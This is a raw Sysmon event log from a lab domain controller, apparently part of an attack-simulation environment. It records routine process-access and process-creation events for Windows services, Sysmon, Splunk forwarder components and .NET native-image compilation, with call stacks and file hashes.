13:26:15.355{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4677-6000-5304-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.355{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4677-6000-5304-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:15.215{08A6967A-4677-6000-5304-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.917{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.902{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4678-6000-5704-000000009A01}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.886{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4678-6000-5704-000000009A01}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.886{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4678-6000-5704-000000009A01}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:16.808{08A6967A-4678-6000-5604-000000009A01}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1338-0\System.Data.OracleClient.dll2021-01-14 13:26:16.808 10341000x80000000000000008458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.402{08A6967A-4678-6000-5404-000000009A01}4464912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.308{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4678-6000-5604-000000009A01}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.292{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4678-6000-5604-000000009A01}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.292{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4678-6000-5604-000000009A01}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4678-6000-5404-000000009A01}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4678-6000-5404-000000009A01}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.246{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4678-6000-5404-000000009A01}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.106{08A6967A-4678-6000-5404-000000009A01}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 